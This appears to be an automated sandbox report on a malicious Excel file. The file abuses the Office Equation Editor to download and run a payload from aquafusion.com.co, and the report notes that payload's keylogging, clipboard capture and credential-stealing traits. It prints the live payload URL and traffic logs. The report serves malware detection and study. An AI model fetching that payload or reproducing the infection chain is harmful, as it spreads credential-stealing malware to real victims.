                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: Joe Sandbox ViewASN Name: GTDCOLOMBIASASCO GTDCOLOMBIASASCO
                  Source: global trafficHTTP traffic detected: GET /ngbx/ngown.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: aquafusion.com.coConnection: Keep-Alive
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036A057D URLDownloadToFileW,2_2_036A057D
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ngown[1].exeJump to behavior
                  Source: global trafficHTTP traffic detected: GET /ngbx/ngown.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: aquafusion.com.coConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: aquafusion.com.co
                  Source: EQNEDT32.EXE, 00000002.00000002.478445950.000000000062F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.477488799.000000000069F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.478511726.000000000069F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aquafusion.com.co/ngbx/ngown.exe
                  Source: EQNEDT32.EXE, 00000002.00000002.478879708.00000000036A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aquafusion.com.co/ngbx/ngown.exej
                  Source: EQNEDT32.EXE, 00000002.00000002.478445950.000000000062F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aquafusion.com.co/ngbx/ngown.exejjC:
                  Source: EQNEDT32.EXE, 00000002.00000003.477488799.000000000069F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.478511726.000000000069F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aquafusion.com.co/ngbx/ngown.exeurC:
                  Source: fryvcftyii.exe, 00000005.00000002.478291301.0000000000180000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.620624233.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://account.dyn.com/

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Contains functionality to log keystrokes (.Net Source)
                  Source: 5.2.fryvcftyii.exe.180000.0.raw.unpack, POq2Ux.cs.Net Code: _6JpPt
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_00434164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_00434164
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_00434164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_00434164
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_00433F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,5_2_00433F66
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_0042001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,5_2_0042001C
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_0044CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,5_2_0044CABC

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: sheet1.xml, type: SAMPLEMatched rule: detects AutoLoad documents using LegacyDrawing Author: ditekSHen
                  Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 5.2.fryvcftyii.exe.180000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 5.2.fryvcftyii.exe.180000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 00000005.00000002.478291301.0000000000180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Binary is likely a compiled AutoIt script file
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: This is a third-party compiled AutoIt script.5_2_003C3B3A
                  Source: fryvcftyii.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: fryvcftyii.exe, 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_215976d6-a
                  Source: fryvcftyii.exe, 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_e12675fd-8
                  Source: ngown[1].exe.2.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_6341b053-a
                  Source: ngown[1].exe.2.drString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_e1d9e07b-0
                  Source: fryvcftyii.exe.2.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_eb915769-6
                  Source: fryvcftyii.exe.2.drString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_4ef33929-1
                  Office equation editor drops PE file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ngown[1].exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_0042A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,5_2_0042A1EF
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_00418310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,5_2_00418310
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_004251BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,5_2_004251BD
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_003CE6A05_2_003CE6A0
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_003E31875_2_003E3187
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_003ED9755_2_003ED975
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_003E21C55_2_003E21C5
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_003F62D25_2_003F62D2
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_004403DA5_2_004403DA
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_003F242E5_2_003F242E
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_003E25FA5_2_003E25FA
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_0041E6165_2_0041E616
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_003D66E15_2_003D66E1
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_003F878F5_2_003F878F
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_004408575_2_00440857
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_003D88085_2_003D8808
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_003F68445_2_003F6844
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_004288895_2_00428889
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_003ECB215_2_003ECB21
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_003F6DB65_2_003F6DB6
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_003D6F9E5_2_003D6F9E
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_003D30305_2_003D3030
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_003EF1D95_2_003EF1D9
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_003C12875_2_003C1287
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_003E14845_2_003E1484
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_003D55205_2_003D5520
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_003E76965_2_003E7696
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_003D57605_2_003D5760
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_003E19785_2_003E1978
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_003F9AB55_2_003F9AB5
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_003CFCE05_2_003CFCE0
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_003EBDA65_2_003EBDA6
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_00447DDB5_2_00447DDB
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_003E1D905_2_003E1D90
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_003CDF005_2_003CDF00
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_003D3FE05_2_003D3FE0
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_00E94C985_2_00E94C98
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_003511306_2_00351130
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_003539086_2_00353908
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0035B1586_2_0035B158
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_003545206_2_00354520
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0035E6086_2_0035E608
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0035D8F96_2_0035D8F9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00353C506_2_00353C50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_006758E86_2_006758E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_006749A06_2_006749A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_006709D06_2_006709D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00677B006_2_00677B00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0035B51A6_2_0035B51A
                  Source: TR-AHYO-12-13-2024.xlam.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ngown[1].exe 4BEC652194B91669F99A72CDC4DBD2DC25138E6DCD64E62248B5F69AA3539471
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe 4BEC652194B91669F99A72CDC4DBD2DC25138E6DCD64E62248B5F69AA3539471
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: String function: 003E8900 appears 42 times
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: String function: 003E0AE3 appears 70 times
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: String function: 003C7DE1 appears 36 times
                  Source: sheet1.xml, type: SAMPLEMatched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing
                  Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 5.2.fryvcftyii.exe.180000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 5.2.fryvcftyii.exe.180000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 00000005.00000002.478291301.0000000000180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 5.2.fryvcftyii.exe.180000.0.raw.unpack, ZTFEpdjP8zw.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 5.2.fryvcftyii.exe.180000.0.raw.unpack, WnRNxU.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 5.2.fryvcftyii.exe.180000.0.raw.unpack, 2njIk.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 5.2.fryvcftyii.exe.180000.0.raw.unpack, I5ElxL.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                  Source: 5.2.fryvcftyii.exe.180000.0.raw.unpack, QQSiOsa4hPS.csCryptographic APIs: 'CreateDecryptor'
                  Source: 5.2.fryvcftyii.exe.180000.0.raw.unpack, FdHU4eb83Z7.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 5.2.fryvcftyii.exe.180000.0.raw.unpack, 3VzYbXLJt4.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 5.2.fryvcftyii.exe.180000.0.raw.unpack, 3VzYbXLJt4.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 5.2.fryvcftyii.exe.180000.0.raw.unpack, 3VzYbXLJt4.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 5.2.fryvcftyii.exe.180000.0.raw.unpack, 3VzYbXLJt4.csCryptographic APIs: 'TransformFinalBlock'
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLSX@6/8@1/1
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_0042A06A GetLastError,FormatMessageW,5_2_0042A06A
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_004181CB AdjustTokenPrivileges,CloseHandle,5_2_004181CB
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_004187E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,5_2_004187E1
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_0042B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,5_2_0042B333
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_0043EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,5_2_0043EE0D
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_0042C397 CoInitialize,CoCreateInstance,CoUninitialize,5_2_0042C397
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_003C4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,5_2_003C4E89
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$TR-AHYO-12-13-2024.xlam.xlsxJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR83AF.tmpJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: TR-AHYO-12-13-2024.xlam.xlsxReversingLabs: Detection: 63%
                  Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe C:\Users\user\AppData\Local\Temp\fryvcftyii.exe
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\user\AppData\Local\Temp\fryvcftyii.exe
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe C:\Users\user\AppData\Local\Temp\fryvcftyii.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\user\AppData\Local\Temp\fryvcftyii.exeJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: TR-AHYO-12-13-2024.xlam.xlsxInitial sample: OLE zip file path = xl/media/image1.png
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: Binary string: wntdll.pdb source: fryvcftyii.exe, 00000005.00000003.476364985.0000000002BC0000.00000004.00001000.00020000.00000000.sdmp, fryvcftyii.exe, 00000005.00000003.476210575.0000000002A60000.00000004.00001000.00020000.00000000.sdmp
                  Source: TR-AHYO-12-13-2024.xlam.xlsxInitial sample: OLE indicators vbamacros = False
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_003C4B37 LoadLibraryA,GetProcAddress,5_2_003C4B37
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_003E8945 push ecx; ret 5_2_003E8958
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ngown[1].exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeJump to dropped file
